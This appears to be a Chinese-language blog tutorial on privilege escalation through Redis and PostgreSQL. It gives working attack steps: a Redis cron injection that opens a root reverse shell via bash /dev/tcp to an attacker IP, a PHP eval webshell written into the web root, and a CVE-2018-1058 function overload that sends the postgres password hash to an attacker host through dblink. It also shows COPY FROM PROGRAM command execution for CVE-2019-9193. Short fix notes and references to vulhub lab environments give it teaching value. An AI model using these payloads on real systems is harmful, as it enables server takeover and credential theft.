提权 - Redis/Postgre数据库
Redis提权
Redis服务因配置不当,可被攻击者恶意利用。黑客借助Redis内置命令,可将现有的数据恶意清空;如果Redis以root身份运行,黑客可往服务器上写入SSH公钥文件,直接登录服务器。
连接(Redis 未授权访问漏洞或有Redis密码)提权方法如下
利用计划任务执行命令反弹shell
条件:
有root账户密码或者Redis存在未授权访问漏洞。
1.通过未授权漏洞连接Redis或通过配置文件找到Redis密码进行连接。
2.执行命令:
set x "\n* * * * * bash -i > &/dev/tcp/接受反弹回话的公网IP/端口 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
执行成功。
已经接收到反弹回话了,并且是root权限。
写ssh-keygen公钥使用私钥登录
在以下条件下,可以利用此方法:
1.Redis服务使用了root帐号启动
2.服务器开房了SSH服务,而且允许使用密钥登录(即远程写入一个公钥,直接登录远程服务器)
此方法利用条件太苛刻,实际中能基本不会用。
具体操作
低权限写webshell(不是提权)
不是提权是写webshell。我们有Redis密码,可以利用redias命令写入webshll。
当登陆后Redis发现权限不高时,服务器开了web服务,在Redis有web目录写入权限的情况跟下,可以尝试往web路径写webshell。
config set dir /var/www/html (要写入的WEB目录)
config set dbdilename shell.php
set x " <?php eval($_REQUEST["123"]); ?>"
save
修复方案:
1.绑定需要访问的数据库的IP,将127.0.0.1修改为需要访问此数据库的iP地址。
2.设置访问密码。在Redis。conf中requirepass字段后,设置添加访问密码。
3.修改Redis服务运行的账号,以低权限运行Redis服务,禁用账号的登录权限
修改后续重启Redis才会生效。
Postgresql提权
CVE-2018-1058
其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。
这个漏洞的原理就是在public空间上重载函数,加入恶意的程序代码。等待其他账户,尤其是高权限账户调用这个函数的时候,就会执行恶意代码(以高权限执行)从而达到远程恶意代码执行的目的。
普通用户连接到数据库—>注入危险代码—>等待超级用户登录触发后门—>收到敏感信息
1.我们先通过普通用户vulhub:vulhub的身份登录postgres: psql --host your-ip --username vulhub
2.执行命令:
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;
然后我在10.0.0.1上监听5433端口,等待超级用户触发我们留下的这个“后门”。
CVE-2019-9193
PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。
高权用户提权
1.首先连接到postgres中。密码获取配置文件中找或其它方式。
2.执行命令:
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
这里的 id 就填我们需要执行的命令。
可以看到它是以是root用户执行。
修复方案:升级版本或打上补丁
这两个漏洞详细参考:https://vulhub.org/#/environments/postgres/CVE-2019-9193/
1951
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
